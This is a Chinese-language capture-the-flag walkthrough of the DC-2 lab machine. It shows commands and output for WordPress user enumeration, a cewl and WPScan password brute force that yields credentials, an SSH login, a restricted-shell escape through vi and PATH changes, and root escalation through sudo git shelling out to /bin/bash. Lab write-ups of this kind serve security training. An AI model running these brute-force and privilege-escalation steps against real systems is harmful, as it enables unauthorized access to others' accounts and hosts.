文章目录
一,工具介绍
(1)cewl密码生成器
用途
- cewl是一个ruby应用,爬行指定url的指定深度。结果会返回一个单词列表,这个列进行密码爆破。
.原理
- 爬取网站上的信息,遍历目录。生成一些可能的密码组合。
.
什么时候用
- 得到管理员用户名,尝试爆破密码时使用
.
常用选项
-w XXX.txt写入到文件
【eg】cewl -w dc2_passwords.txt http://dc-2
(2)WPScan
用途
- WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。
.
常用选项
--update更新漏洞库--url URL扫描指定URL(WordPressCMS)的漏洞--enumerate u扫描wordpress用户
(3)linux提权思路
1. sudo -l 查看有SUID的命令
2. 使用sudo 命令
3. 利用suid权限的特性提权为root
二,测试流程
(1)主机发现
nmap扫描
【思路】
针对扫描出的开放服务(应用程序)的处理思路
1. 针对版本搜索相关漏洞
2. 针对协议本身
(2)根据80端口的进一步测试
先写入
192.168.44.133 dc-2到hosts文件
WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,get CMS
【思路】
☞ 根据CMS做进一步的操作
1. 成熟的CMS一般自身不会有漏洞,可以关注其插件的问题
2. 尝试得知CMS版本,做进一步的漏洞搜索
3. 搜索相关CMS的测试工具
(3)攻击准备
提示使用cewl工具
使用方法,使用cewl生成密码
针对cms使用相关的工具
使用wpscan工具
root@kali:~# wpscan --url http://dc-2 --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.3.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://dc-2/
[+] Started: Sun Sep 15 11:51:38 2019
Interesting Finding(s):
[+] http://dc-2/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.7.10 identified.
| Detected By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] Enumerating Users
Brute Forcing Author IDs - Time: 00:00:00 <===========================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Detected By: Rss Generator (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jerry
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Finished: Sun Sep 15 11:51:40 2019
[+] Requests Done: 20
[+] Memory used: 32.027 MB
[+] Elapsed time: 00:00:01
扫描出了三个用户
结合cewl工具生成的字典文件进行爆破
root@kali:~# wpscan --url http://dc-2/ -U dc-2_user.txt -P dc2_passwords.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.3.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://dc-2/
[+] Started: Sun Sep 15 12:04:47 2019
Interesting Finding(s):
[+] http://dc-2/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <============================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / next Time: 00:00:30 <=================================> (644 / 644) 100.00% Time: 00:00:30
Trying admin / find Time: 00:00:30 <=================================> (644 / 644) 100.00% Time: 00:00:30
WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Trying admin / find Time: 00:00:30 <=================================> (644 / 644) 100.00% Time: 00:00:30
Trying admin / log Time: 00:00:30 <==================================> (644 / 644) 100.00% Time: 00:00:30
WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError.
Trying admin / log Time: 00:00:30 <==================================> (644 / 644) 100.00% Time: 00:00:30
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[+] Finished: Sun Sep 15 12:05:19 2019
[+] Requests Done: 699
[+] Memory used: 111.535 MB
[+] Elapsed time: 00:00:32
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
(4)结合扫描出来的服务,尝试SSH登录
root@kali:~# ssh tom@192.168.44.133 -p 7744
The authenticity of host '[192.168.44.133]:7744 ([192.168.44.133]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.44.133]:7744' (ECDSA) to the list of known hosts.
tom@192.168.44.133's password:
Permission denied, please try again.
tom@192.168.44.133's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ cd
-rbash: cd: restricted
尝试为tom可以登录
发现为受限shell(限制了可执行的命令)
【思路】
SSH后查看是什么shell
这里发现是受限制的shell -->尝试绕过
用vi的
:set shell=/bin/bash
: shell
之后export -p查看发现PATH变量可以写入
export PATH=$PATH:/bin/
【过程】
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export -p
declare -x HOME="/home/tom"
declare -x LANG="en_US.UTF-8"
declare -x LC_MEASUREMENT="zh_CN.UTF-8"
declare -x LC_MONETARY="zh_CN.UTF-8"
declare -x LC_NUMERIC="zh_CN.UTF-8"
declare -x LC_PAPER="zh_CN.UTF-8"
declare -x LC_TIME="zh_CN.UTF-8"
declare -x LOGNAME="tom"
declare -x MAIL="/var/mail/tom"
declare -x OLDPWD
declare -x PATH="/home/tom/usr/bin:/bin/" ?加入了/bin
declare -x PWD="/home/tom"
declare -x SHELL="/bin/rbash"
declare -x SHLVL="2"
declare -x SSH_CLIENT="192.168.44.128 54410 7744"
declare -x SSH_CONNECTION="192.168.44.128 54410 192.168.44.133 7744"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="tom"
declare -x VIM="/usr/share/vim"
declare -x VIMRUNTIME="/usr/share/vim/vim74"
添加了环境变量后可以执行的命令就多了啊!
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
tom@DC-2:~$ su jerry
Password:
切换到jerry用户
jerry@DC-2:/home/tom$ cd /home/jerry/
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
jerry@DC-2:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
提示了用git命令使用SUID提权到root
status Show the working tree status
tag Create, list, delete or verify a tag object signed with GPG
'git help -a' and 'git help -g' lists available subcommands and some
concept guides. See 'git help <command>' or 'git help <concept>'
!/bin/bash
root@DC-2:/home/jerry# cd ~
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
root@DC-2:~#
418
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
